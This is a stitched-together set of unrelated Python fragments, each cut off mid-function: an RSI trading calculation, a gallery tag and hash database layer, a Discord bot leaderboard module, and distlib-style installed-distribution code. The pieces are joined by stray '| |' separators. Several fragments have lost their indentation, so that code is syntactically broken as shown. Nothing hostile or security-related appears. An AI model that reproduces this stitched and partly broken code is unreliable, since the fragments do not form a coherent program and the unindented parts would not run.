losses = self.avgLoss
startRSI = self.rsi[-1]
expectedTime = 0
avgDiff = 0
for i in range(1, len(self.rsi)):
avgDiff += abs(self.rsi[i] - self.rsi[i-1])
avgDiff /= (len(self.rsi) - 1)
candles = int(abs(startRSI - 50) / avgDiff + 0.5)
lastDiff = startRSI-self.rsi[-2]
g_l = 100/((100/(1+gains/losses))-lastDiff)-1
if lastDiff < 0:
gains = gains*13/14
losses = gains/g_l
elif lastDiff > 0:
losses = losses*13/14
gains = losses*g_l
gainOrLoss = 0
if startRSI > 50: avgDiff *= -1
for i in range(candles):
g_l = 100/((100/(1+gains/losses))-avgDiff)-1
if startRSI > 50:
gains = gains*13/14
tempL = gains/g_l
gainOrLoss -= tempL*14 - 13*losses
#print(g_l, gains, tempL, tempL*14 - 13*losses)
losses = tempL
elif startRSI < 50:
losses = losses*13/14
tempG = losses*g_l
gainOrLoss += tempG*14 - 13*gains
gains = tempG
return candles, gainOrLoss
tempRSI = startRSI
while (tempRSI > 50 and startRSI > 50) or (tempRSI < 50 and startRSI < 50):
if startRSI < 50:
| |
return None
# time to map the tags to the namespace now
for tag_id in tags_id_list:
# First check if tags mappings exists
try:
t_map_id = look_exist_tag_map(tag_id)
if t_map_id:
tags_mappings_id_list.append(t_map_id)
else:
raise TypeError
except TypeError:
c = cls.execute('INSERT INTO tags_mappings(namespace_id, tag_id) VALUES(?, ?)',
(namespace_id, tag_id,))
# add the tags_mappings_id to our list
tags_mappings_id_list.append(c.lastrowid)
# Lastly we map the series_id to the tags_mappings
executing = []
for tags_map in tags_mappings_id_list:
executing.append((series_id, tags_map,))
# cls.execute(cls, 'INSERT INTO series_tags_map(series_id, tags_mappings_id)
# VALUES(?, ?)', (series_id, tags_map,))
cls.executemany('INSERT OR IGNORE INTO series_tags_map(series_id, tags_mappings_id) VALUES(?, ?)',
executing)
@staticmethod
def modify_tags(series_id, dict_of_tags):
    """Replace every tag mapping of a gallery with the given tags dict."""
    # Drop the old namespace/tag mappings, then re-add from scratch via a
    # throwaway Gallery carrying only the id and the new tags.
    TagDB.del_gallery_mapping(series_id)
    stub = Gallery()
    stub.id = series_id
    stub.tags = dict_of_tags
    TagDB.add_tags(stub)
@staticmethod
def get_tag_gallery(tag):
    """Returns all galleries with the given tag.

    NOTE(review): not implemented yet -- stub that currently returns None.
    """
    pass
@classmethod
def get_ns_tags(cls):
    """Returns a dict of all tags with namespace as key and list of tags as value"""
    cursor = cls.execute('SELECT namespace_id, tag_id FROM tags_mappings')
    ns_tags = {}
    ns_id_history = {}  # namespace_id -> namespace cache, avoids refetching
    for t in cursor.fetchall():
        try:
            # get namespace (cached)
            if t['namespace_id'] in ns_id_history:
                ns = ns_id_history[t['namespace_id']]
            else:
                c = cls.execute('SELECT namespace FROM namespaces WHERE namespace_id=?', (t['namespace_id'],))
                ns = c.fetchone()['namespace']
                ns_id_history[t['namespace_id']] = ns
            # get tag
            c = cls.execute('SELECT tag FROM tags WHERE tag_id=?', (t['tag_id'],))
            tag = c.fetchone()['tag']
        except (TypeError, KeyError, IndexError):
            # fetchone() returned None (dangling id) or the row lacks the
            # column; skip just this mapping. (Was a bare `except:`, which
            # also swallowed real DB errors and KeyboardInterrupt.)
            continue
        ns_tags.setdefault(ns, []).append(tag)
    return ns_tags
@staticmethod
def get_tags_from_namespace(namespace):
    """Returns a dict with namespace as key and list of tags as value.

    NOTE(review): not implemented yet -- stub that currently returns None.
    """
    pass
@staticmethod
def get_ns_tags_to_gallery(ns_tags):
    """
    Returns all galleries linked to the namespace tags.
    Receives a dict like this: {"namespace":["tag1","tag2"]}

    NOTE(review): not implemented yet -- stub that currently returns None.
    """
    pass
@classmethod
def get_all_tags(cls):
    """Return every tag stored in the database, as a list of strings."""
    rows = cls.execute('SELECT tag FROM tags').fetchall()
    return [row['tag'] for row in rows]
@classmethod
def get_all_ns(cls):
    """Return every namespace stored in the database, as a list of strings."""
    rows = cls.execute('SELECT namespace FROM namespaces').fetchall()
    return [row['namespace'] for row in rows]
class ListDB(DBBase):
    """
    Persistence layer for user-defined gallery lists (the `list` table)
    and their gallery mappings (the `series_list_map` table).
    """

    @classmethod
    def init_lists(cls):
        """Creates and returns lists fetched from DB"""
        lists = []
        c = cls.execute('SELECT * FROM list')
        list_rows = c.fetchall()
        for l_row in list_rows:
            l = GalleryList(l_row['list_name'], filter=l_row['list_filter'], id=l_row['list_id'])
            if l_row['type'] == GalleryList.COLLECTION:
                l.type = GalleryList.COLLECTION
            elif l_row['type'] == GalleryList.REGULAR:
                l.type = GalleryList.REGULAR
            # profile is stored as bytes; expose it as str
            profile = l_row['profile']
            if profile:
                l.profile = bytes.decode(profile)
            # flag columns are stored as 0/1 integers
            l.enforce = bool(l_row['enforce'])
            l.regex = bool(l_row['regex'])
            l.case = bool(l_row['l_case'])
            l.strict = bool(l_row['strict'])
            lists.append(l)
            # register globally so the rest of the app sees the list
            app_constants.GALLERY_LISTS.add(l)
        return lists

    @classmethod
    def query_gallery(cls, gallery):
        """Maps gallery to the correct lists"""
        c = cls.execute('SELECT list_id FROM series_list_map WHERE series_id=?', (gallery.id,))
        list_rows = [x['list_id'] for x in c.fetchall()]
        for l in app_constants.GALLERY_LISTS:
            # NOTE(review): reads the private _id directly rather than the
            # id property used elsewhere -- confirm this is intentional.
            if l._id in list_rows:
                # mapping already exists in DB, so skip the filter check
                l.add_gallery(gallery, False, _check_filter=False)

    @classmethod
    def modify_list(cls, gallery_list: GalleryList):
        # Persists all editable columns of an existing list; a list without
        # an id (never saved) is silently ignored.
        assert isinstance(gallery_list, GalleryList)
        if gallery_list.id:
            cls.execute("""UPDATE list SET list_name=?, list_filter=?, profile=?,
                        type=?, enforce=?, regex=?, l_case=?, strict=? WHERE list_id=?""",
                        (gallery_list.name, gallery_list.filter, str.encode(gallery_list.profile),
                         gallery_list.type, int(gallery_list.enforce), int(gallery_list.regex), int(gallery_list.case),
                         int(gallery_list.strict), gallery_list.id))

    @classmethod
    def add_list(cls, gallery_list: GalleryList):
        """Adds a list of GalleryList class to DB"""
        assert isinstance(gallery_list, GalleryList)
        if gallery_list.id:
            # already persisted: update in place instead of inserting
            ListDB.modify_list(gallery_list)
        else:
            c = cls.execute("""INSERT INTO list(list_name, list_filter, profile, type,
                            enforce, regex, l_case, strict) VALUES(?, ?, ?, ?, ?, ?, ?, ?)""",
                            (
                                gallery_list.name, gallery_list.filter, str.encode(gallery_list.profile),
                                gallery_list.type,
                                int(gallery_list.enforce), int(gallery_list.regex), int(gallery_list.case),
                                int(gallery_list.strict)))
            # remember the freshly assigned primary key on the object
            gallery_list._id = c.lastrowid
        # (re)create gallery mappings for the list's current members
        ListDB.add_gallery_to_list(gallery_list.galleries(), gallery_list)

    @classmethod
    def _g_id_or_list(cls, gallery_or_id_or_list: Union[Gallery, int, List[Gallery], List[int]]) -> List[int]:
        """Returns gallery ids"""
        # Normalize a single Gallery/id into a list, then map Gallery
        # objects to their ids.
        if isinstance(gallery_or_id_or_list, (Gallery, int)):
            gallery_or_id_or_list = [gallery_or_id_or_list]
        return [g.id if isinstance(g, Gallery) else g for g in gallery_or_id_or_list]

    @classmethod
    def add_gallery_to_list(cls, gallery_or_id_or_list: Union[Gallery, int, List[Gallery], List[int]],
                            gallery_list: GalleryList) -> None:
        """Maps provided gallery or list of galleries or gallery id to list"""
        assert isinstance(gallery_list, GalleryList)
        g_ids = cls._g_id_or_list(gallery_or_id_or_list)
        values = [(gallery_list.id, x) for x in g_ids]
        # OR IGNORE keeps pre-existing mappings intact
        cls.executemany('INSERT OR IGNORE INTO series_list_map(list_id, series_id) VALUES(?, ?)', values)

    @classmethod
    def remove_list(cls, gallery_list):
        """Deletes list from DB"""
        assert isinstance(gallery_list, GalleryList)
        if gallery_list.id:
            # NOTE(review): series_list_map rows are not deleted here --
            # presumably handled by a FK cascade; verify against the schema.
            cls.execute('DELETE FROM list WHERE list_id=?', (gallery_list.id,))
        try:
            app_constants.GALLERY_LISTS.remove(gallery_list)
        except KeyError:
            # not registered globally; nothing to do
            pass

    @classmethod
    def remove_gallery_from_list(cls, gallery_or_id_or_list: Union[Gallery, int, List[int]], gallery_list: GalleryList):
        """Removes provided gallery or list of galleries or gallery id from list"""
        assert isinstance(gallery_list, GalleryList)
        if gallery_list.id:
            g_ids = ListDB._g_id_or_list(gallery_or_id_or_list)
            values = [(gallery_list.id, x) for x in g_ids]
            cls.executemany('DELETE FROM series_list_map WHERE list_id=? AND series_id=?', values)
class HashDB(DBBase):
"""
Contains the following methods:
find_gallery -> returns galleries which matches the given list of hashes
get_gallery_hashes -> returns all hashes with the given gallery id in a list
get_gallery_hash -> returns hash of chapter specified. If page is specified, returns hash of chapter page
gen_gallery_hashes <- generates hashes for gallery's chapters and inserts them to db
rebuild_gallery_hashes <- inserts hashes into DB only if it doesnt already exist
"""
@classmethod
def find_gallery(cls, hashes: List):
    """Find the gallery best matching the given image hashes.

    Returns a weak Gallery (only .id set) for the gallery matching the most
    of the supplied hashes, but only when *every* hash matched at least one
    gallery; otherwise returns None.
    """
    assert isinstance(hashes, list)
    match_counts = {}   # series_id -> number of supplied hashes it matched
    all_matched = True  # stays True only if every hash hit some gallery
    # renamed loop var: `hash` shadowed the builtin, and `r` was reused for
    # both the cursor and the row in the original.
    for h in hashes:
        cursor = cls.execute('SELECT series_id FROM hashes WHERE hash=?', (h,))
        try:
            rows = cursor.fetchall()
            if not rows:
                all_matched = False
            for row in rows:
                g_id = row['series_id']
                match_counts[g_id] = match_counts.get(g_id, 0) + 1
        except (KeyError, TypeError):
            # malformed row: treat this hash as unmatched, as before
            all_matched = False
    if all_matched:
        # pick the gallery with the most matching hashes (first wins ties,
        # matching the original strict-greater scan)
        best_id = None
        best_count = 0
        for g_id, count in match_counts.items():
            if count > best_count:
                best_count = count
                best_id = g_id
        if best_id:
            weak_gallery = Gallery()
            weak_gallery.id = best_id
            return weak_gallery
    return None
@classmethod
def get_gallery_hashes(cls, gallery_id: int) -> List[bytes]:
    """Returns all hashes with the given gallery id in a list"""
    cursor = cls.execute('SELECT hash FROM hashes WHERE series_id=?',
                         (gallery_id,))
    collected = []
    try:
        for record in cursor.fetchall():
            collected.append(record['hash'])
    except IndexError:
        # row did not contain the expected column; treat as no hashes
        return []
    return collected
@classmethod
def get_gallery_hash(cls, gallery_id: int, chapter: int, page: Optional[int] = None) -> Optional[List[bytes]]:
    """
    Returns hashes of the given chapter in a list.
    If page is specified, only hashes of that chapter page are returned.
    Returns None when the chapter does not exist.
    """
    assert isinstance(gallery_id, int)
    assert isinstance(chapter, int)
    # BUGFIX: `if page:` treated page 0 as "no page specified"; compare
    # against None so the first page can be queried too.
    if page is not None:
        assert isinstance(page, int)
    chap_id = ChapterDB.get_chapter_id(gallery_id, chapter)
    if not chap_id:
        return None
    if page is not None:
        executing = ["SELECT hash FROM hashes WHERE series_id=? AND chapter_id=? AND page=?",
                     (gallery_id, chap_id, page)]
    else:
        executing = ["SELECT hash FROM hashes WHERE series_id=? AND chapter_id=?",
                     (gallery_id, chap_id)]
    hashes = []
    c = cls.execute(*executing)  # fixed `exceuting` typo
    for h in c.fetchall():
        try:
            hashes.append(h['hash'])
        except KeyError:
            # row without a hash column; skip it
            pass
    return hashes
@classmethod
def gen_gallery_hash(cls, gallery: Gallery, chapter: int, page: Union[int, str, List, None] = None, color_img=False,
_name=None) -> Union[Dict[Union[int, str], Union[bytes, str, 'os.PathLike']], Iterable[bytes]]:
"""
Generate hash for a specific chapter.
Set page to only generate specific page
page: 'mid' or number or list of numbers
color_img: if true then a hash to colored img will be returned if possible
Returns dict with chapter number or 'mid' as key and hash as value
"""
assert isinstance(gallery, Gallery)
assert isinstance(chapter, int)
if page is not None:
assert isinstance(page, (int, str, list))
skip_gen = False
chap_id = None
hashes = {}
if gallery.id is not None:
chap_id = ChapterDB.get_chapter_id(gallery.id, chapter)
c = cls.execute('SELECT hash, page FROM hashes WHERE series_id=? AND chapter_id=?',
(gallery.id, chap_id,))
hashes = {}
for r in c.fetchall():
try:
if r['hash'] and r['page'] is not None:
hashes[r['page']] = r['hash']
except TypeError:
pass
if isinstance(page, (int, list)):
if isinstance(page, int):
_page = [page]
else:
_page = page
h = {}
t = False
for p in _page:
if p in hashes:
h[p] = hashes[p]
else:
t = True
if not t:
skip_gen = True
hashes = h
elif gallery.chapters[chapter].pages == len(hashes.keys()):
skip_gen = True
if page == "mid":
try:
hashes = {'mid': hashes[len(hashes) // 2]}
except KeyError:
skip_gen = False
if not skip_gen or color_img:
def look_exists(page):
"""check if hash already exists in database
returns hash, else returns None"""
c = cls.execute('SELECT hash FROM hashes WHERE page=? AND chapter_id=?',
(page, chap_id,))
try: # exists
return c.fetchone()['hash']
except TypeError: # doesnt exist
return None
except IndexError:
return None
if gallery.dead_link:
log_e("Could not generate hash of dead gallery: {}".format(gallery.title.encode(errors='ignore')))
return {}
try:
chap = gallery.chapters[chapter]
except KeyError:
utils.make_chapters(gallery)
try:
chap = gallery.chapters[chapter]
except KeyError:
return {}
executing = []
try:
if gallery.is_archive:
raise NotADirectoryError
imgs = | |
<filename>modules/toplist.py
from audiovisuaali import send
from config import OWNER_ID as owners
from mysqlfiles import users_get_top_xp
from discord.utils import get as duget
from config import COMMAND_START as starter
from mysqlfiles import points_stats_get_win_high
from mysqlfiles import points_stats_get_lost_high
from mysqlfiles import users_get_top_points_by_wallet
from mysqlfiles import users_get_top_points_by_bank
from mysqlfiles import users_get_top_points_with_bank
from mysqlfiles import points_stats_get_high
# TODO: add .format() for each row
# Formats username if nick is present or user left the server
def users_name(user_object, row):
    """Display name for a member: the nick when set, else the username, or
    a placeholder containing the stored id when the member has left."""
    if user_object is None:
        return "User left the server ID:{}".format(row[0])
    return user_object.name if user_object.nick is None else user_object.nick
# Number checker
def check_is_number(number):
try:
int(number)
return True
except:
return False
# Get points
async def top(message, client, arguments):
try:
# No arguments give normal list
if len(arguments) == 0:
# header
rows = "**Ranking top __memes__ order by condescending (wallet + bank)**```py\nRank | Name \n\n"
# Getting results
result = users_get_top_points_with_bank(client.user.id, 5)
number = 1
# Creating scoreboard
for row in result:
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# stat
rows = rows + "[{}{}] {}\n{}->{} memes ({}+{})\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[3]),str(row[1]),str(row[2]))
number += 1
# Creating scoreboard and sending it
rows += "```\n**Ranking top __xp__ order by condescending**\n```py\nRank | Name\n\n"
# Getting top users by points
result, number = users_get_top_xp(client.user.id, 5), 1
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{} xp\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[1]))
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```\n**For more information you can do:\n1. {}top points/memes\n2. {}top memes wallet/bank\n3. {}top xp\n4. {}top win/wins\n5. {}top lose/lost/loses\n6. {}top roulette wins/loses\n7. {}top slots wins/loses**".format(rows, starter, starter, starter, starter, starter, starter, starter)
elif arguments[0] in ["memes", "points"]:
if len(arguments) in [2,3] and not check_is_number(arguments[1]):
if len(arguments) == 3:
if message.author.id not in owners:
return
try:
rows_amount = int(arguments[2])
except:
rows_amount = 10
if rows_amount > 30:
rows_amount = 30
else:
rows_amount = 10
# Wallet
if arguments[1] == "wallet":
rows = "**Ranking top __memes__ order by condescending (wallet)**\n```py\nRank | Name \n\n"
result = users_get_top_points_by_wallet(client.user.id, rows_amount)
# Bank
elif arguments[1] == "bank":
rows = "**Ranking top __memes__ order by condescending (bank)**\n```py\nRank | Name \n\n"
result = users_get_top_points_by_bank(client.user.id, rows_amount)
# Return bad input
else:
return
number = 1
# Creating scoreboard
for row in result:
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# stat
rows = rows + "[{}{}] {}\n{}->{} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[1]))
number += 1
scoreboard = rows + "```"
else:
if len(arguments) == 2:
try:
rows_amount = int(arguments[1])
except:
rows_amount = 10
else:
rows_amount = 10
# header
rows = "**Ranking top __memes__ order by condescending (wallet + bank)**\n```py\nRank | Name \n\n"
# Getting results
result = users_get_top_points_with_bank(client.user.id, rows_amount)
number = 1
# Creating scoreboard
for row in result:
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# stat
rows = rows + "[{}{}] {}\n{}->{} memes ({}+{})\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[3]),str(row[1]),str(row[2]))
number += 1
scoreboard = rows + "```"
elif arguments[0] == "xp":
if len(arguments) == 2:
try:
rows_amount = int(arguments[1])
except:
rows_amount = 10
else:
rows_amount = 10
# header
rows, number = "**Ranking top __xp__ order by condescending**```py\nRank | Name \n\n", 1
# Getting top users by points
result = users_get_top_xp(client.user.id, rows_amount)
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{} xp\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[1]))
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
elif arguments[0] in ["win", "wins"]:
limit = 10
# header
rows, number = "**Ranking top __wins__ order by condescending**```py\nRank | Name \n\n", 1
# Getting top users by points
result = points_stats_get_win_high(limit)
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
# [01] username \n mode<spacing>
print(len(result))
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(10-len(row[3])),row[6])
#rows = rows + "[{}{}] {}\n{}->{} xp\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[1]))
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
elif arguments[0] in ["lose", "lost", "loses"]:
limit = 10
# header
rows, number = "**Ranking top __loses__ order by condescending**```py\nRank | Name \n\n", 1
# Getting top users by points
result = points_stats_get_lost_high(limit)
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(10-len(row[3])),row[6])
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
elif arguments[0] == "slots":
if len(arguments) in [2,3] and not check_is_number(arguments[1]):
if arguments[1] in ["win", "wins"]:
rows = "**Ranking top __slots wins__ order by condescending**```py\nRank | Name \n\n"
mode = "plus"
elif arguments[1] in ["lose", "lost", "loses"]:
rows = "**Ranking top __slots loses__ order by condescending**```py\nRank | Name \n\n"
mode = "minus"
else:
return
# Limit
limit = 10
# header
number = 1
# Getting top users by points, 8 for slots
result = points_stats_get_high(8, mode, limit) #minus
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
# [01] username \n mode<spacing>
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(6-len(row[3])),row[6])
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
else:
# header
rows, number = "**Ranking top __slots wins__ order by condescending**```py\nRank | Name \n\n", 1
# Getting top users by points, 8 for slots
result = points_stats_get_high(8, "plus", 5) #minus
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(6-len(row[3])),row[6])
number += 1
number = 1
rows = rows + "```\n**Ranking top __slots loses__ order by condescending**\n```py\nRank | Name \n\n"
# Getting top users by points, 8 for slots
result = points_stats_get_high(8, "minus", 5) #minus
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(8-len(row[3])),row[6])
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```\n**For more information you can do:\n1. {}top slots wins\n2. {}top slots loses**".format(rows, starter, starter)
elif arguments[0] == "roulette":
if len(arguments) in [2,3] and not check_is_number(arguments[1]):
if arguments[1] in ["win", "wins"]:
rows = "**Ranking top __roulette wins__ order by condescending**```py\nRank | Name \n\n"
mode = "plus"
elif arguments[1] in ["lose", "lost", "loses"]:
rows = "**Ranking top __roulette loses__ order by condescending**```py\nRank | Name \n\n"
mode = "minus"
else:
return
# Limit
limit = 10
# header
number = 1
# Getting top users by points, 8 for slots
result = points_stats_get_high(5, mode, limit) #minus
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
# [01] username \n mode<spacing>
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(6-len(row[3])),row[6])
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
else:
# header
rows, number = "**Ranking top __roulette wins__ order by condescending**```py\nRank | Name \n\n", 1
# Getting | |
"""
# Requirement may contain extras - parse to lose those
# from what's passed to the matcher
r = parse_requirement(req)
scheme = get_scheme(self.metadata.scheme)
try:
matcher = scheme.matcher(r.requirement)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
result = False
for p in self.provides:
p_name, p_ver = parse_name_and_version(p)
if p_name != name:
continue
try:
result = matcher.match(p_ver)
break
except UnsupportedVersionError:
pass
return result
def __repr__(self):
    """
    Return a textual representation of this instance.
    """
    suffix = (' [%s]' % self.source_url) if self.source_url else ''
    return '<Distribution %s (%s)%s>' % (self.name, self.version, suffix)
def __eq__(self, other):
    """
    See if this distribution is the same as another.
    :param other: The distribution to compare with. To be equal to one
                  another, distributions must have the same type, name,
                  version and source_url.
    :return: True if it is the same, else False.
    """
    # Guard clause: different (sub)types are never equal.
    if type(other) is not type(self):
        return False
    return (self.name == other.name
            and self.version == other.version
            and self.source_url == other.source_url)
def __hash__(self):
    """
    Compute hash in a way which matches the equality test.
    """
    # Sum of the component hashes -- numerically identical to the
    # historical hash(name) + hash(version) + hash(source_url).
    return sum(hash(part) for part in (self.name, self.version, self.source_url))
class BaseInstalledDistribution(Distribution):
    """
    This is the base class for installed distributions (whether PEP 376 or
    legacy).
    """

    # Default hash algorithm name (a hashlib attribute name, e.g. 'sha256');
    # None means MD5 with no prefix. Subclasses may override.
    hasher = None

    def __init__(self, metadata, path, env=None):
        """
        Initialise an instance.
        :param metadata: An instance of :class:`Metadata` which describes the
                         distribution. This will normally have been initialised
                         from a metadata file in the ``path``.
        :param path: The path of the ``.dist-info`` or ``.egg-info``
                     directory for the distribution.
        :param env: This is normally the :class:`DistributionPath`
                    instance where this distribution was found.
        """
        super(BaseInstalledDistribution, self).__init__(metadata)
        self.path = path
        self.dist_path = env

    def get_hash(self, data, hasher=None):
        """
        Get the hash of some data, using a particular hash algorithm, if
        specified.

        :param data: The data to be hashed.
        :type data: bytes
        :param hasher: The name of a hash implementation, supported by hashlib,
                       or ``None``. Examples of valid values are ``'sha1'``,
                       ``'sha224'``, ``'sha384'``, '``sha256'``, ``'md5'`` and
                       ``'sha512'``. If no hasher is specified, the ``hasher``
                       attribute of the :class:`InstalledDistribution` instance
                       is used. If the hasher is determined to be ``None``, MD5
                       is used as the hashing algorithm.
        :returns: The hash of the data. If a hasher was explicitly specified,
                  the returned hash will be prefixed with the specified hasher
                  followed by '='.
        :rtype: str
        """
        if hasher is None:
            hasher = self.hasher
        if hasher is None:
            hasher = hashlib.md5
            prefix = ''
        else:
            # BUGFIX: the prefix previously used self.hasher, so an
            # explicitly passed algorithm was mislabelled (and a None
            # self.hasher produced a literal 'None=' prefix). Use the
            # resolved algorithm name, as the docstring promises.
            prefix = '%s=' % hasher
            hasher = getattr(hashlib, hasher)
        digest = hasher(data).digest()
        digest = base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')
        return '%s%s' % (prefix, digest)
class InstalledDistribution(BaseInstalledDistribution):
"""
Created with the *path* of the ``.dist-info`` directory provided to the
constructor. It reads the metadata contained in ``pydist.json`` when it is
instantiated., or uses a passed in Metadata instance (useful for when
dry-run mode is being used).
"""
hasher = 'sha256'
def __init__(self, path, metadata=None, env=None):
    """Initialise from a ``.dist-info`` directory path.

    :param path: the ``.dist-info`` directory.
    :param metadata: optional pre-built Metadata (skips reading from disk).
    :param env: the DistributionPath that located this distribution; its
                cache is consulted and updated when enabled.
    """
    self.modules = []
    self.finder = finder = resources.finder_for_path(path)
    if finder is None:
        raise ValueError('finder unavailable for %s' % path)
    # Prefer cached metadata from the environment when available.
    if env and env._cache_enabled and path in env._cache.path:
        metadata = env._cache.path[path].metadata
    elif metadata is None:
        # Fallback chain of metadata file names, newest first.
        r = finder.find(METADATA_FILENAME)
        # Temporary - for Wheel 0.23 support
        if r is None:
            r = finder.find(WHEEL_METADATA_FILENAME)
        # Temporary - for legacy support
        if r is None:
            r = finder.find(LEGACY_METADATA_FILENAME)
        if r is None:
            raise ValueError('no %s found in %s' % (METADATA_FILENAME,
                                                    path))
        with contextlib.closing(r.as_stream()) as stream:
            metadata = Metadata(fileobj=stream, scheme='legacy')
    super(InstalledDistribution, self).__init__(metadata, path, env)
    if env and env._cache_enabled:
        env._cache.add(self)
    # A REQUESTED marker file means the dist was installed by direct user
    # request (PEP 376), not as a dependency.
    r = finder.find('REQUESTED')
    self.requested = r is not None
    # top_level.txt lists the importable top-level modules/packages.
    p = os.path.join(path, 'top_level.txt')
    if os.path.exists(p):
        with open(p, 'rb') as f:
            data = f.read().decode('utf-8')
        self.modules = data.splitlines()
def __repr__(self):
    """Unambiguous representation including name, version and path."""
    details = (self.name, self.version, self.path)
    return '<InstalledDistribution %r %s at %r>' % details
def __str__(self):
    """Human-readable 'name version' string."""
    return ' '.join([str(self.name), str(self.version)])
def _get_records(self):
    """
    Get the list of installed files for the distribution.
    :return: A list of tuples of path, hash and size. Note that hash and
             size might be ``None`` for some entries. The path is exactly
             as stored in the file (which is as in PEP 376).
    """
    entries = []
    resource = self.get_distinfo_resource('RECORD')
    with contextlib.closing(resource.as_stream()) as stream:
        with CSVReader(stream=stream) as record_reader:
            # RECORD rows are path[,hash[,size]]; pad short rows with None.
            for row in record_reader:
                padded = row + [None] * (3 - len(row))
                path, checksum, size = padded
                entries.append((path, checksum, size))
    return entries
@cached_property
def exports(self):
    """
    Return the information exported by this distribution.
    :return: A dictionary of exports, mapping an export category to a dict
             of :class:`ExportEntry` instances describing the individual
             export entries, and keyed by name.
    """
    # Only parse when the exports file is actually present.
    if self.get_distinfo_resource(EXPORTS_FILENAME):
        return self.read_exports()
    return {}
def read_exports(self):
    """
    Read exports data from a file in .ini format.
    :return: A dictionary of exports, mapping an export category to a list
             of :class:`ExportEntry` instances describing the individual
             export entries.
    """
    resource = self.get_distinfo_resource(EXPORTS_FILENAME)
    if not resource:
        return {}
    with contextlib.closing(resource.as_stream()) as stream:
        # delegates to the module-level read_exports() parser
        return read_exports(stream)
def write_exports(self, exports):
    """
    Write a dictionary of exports to a file in .ini format.
    :param exports: A dictionary of exports, mapping an export category to
                    a list of :class:`ExportEntry` instances describing the
                    individual export entries.
    """
    target = self.get_distinfo_file(EXPORTS_FILENAME)
    with open(target, 'w') as stream:
        # delegates to the module-level write_exports() serializer
        write_exports(exports, stream)
def get_resource_path(self, relative_path):
    """
    NOTE: This API may change in the future.

    Return the absolute path to a resource file with the given relative
    path.
    :param relative_path: The path, relative to .dist-info, of the resource
                          of interest.
    :return: The absolute path where the resource is to be found.
    """
    resource = self.get_distinfo_resource('RESOURCES')
    with contextlib.closing(resource.as_stream()) as stream:
        with CSVReader(stream=stream) as resources_reader:
            # RESOURCES maps relative resource paths to installed locations.
            for relative, destination in resources_reader:
                if relative == relative_path:
                    return destination
    raise KeyError('no resource file with relative path %r '
                   'is installed' % relative_path)
def list_installed_files(self):
    """
    Iterates over the ``RECORD`` entries and yields a tuple
    ``(path, hash, size)`` for each line.
    :returns: iterator of (path, hash, size)
    """
    for entry in self._get_records():
        yield entry
def write_installed_files(self, paths, prefix, dry_run=False):
"""
Writes the ``RECORD`` file, using the ``paths`` iterable passed in. Any
existing ``RECORD`` file is silently overwritten.
prefix is used to determine when to write absolute paths.
"""
prefix = os.path.join(prefix, '')
base = os.path.dirname(self.path)
base_under_prefix = base.startswith(prefix)
base = os.path.join(base, '')
record_path = self.get_distinfo_file('RECORD')
logger.info('creating %s', record_path)
if dry_run:
return None
with CSVWriter(record_path) as writer:
for path in paths:
if os.path.isdir(path) or path.endswith(('.pyc', '.pyo')):
# do not put size and hash, as in PEP-376
hash_value = size = ''
else:
size = '%d' % os.path.getsize(path)
with open(path, 'rb') as fp:
hash_value = self.get_hash(fp.read())
if path.startswith(base) or (base_under_prefix and
path.startswith(prefix)):
path = os.path.relpath(path, base)
writer.writerow((path, hash_value, size))
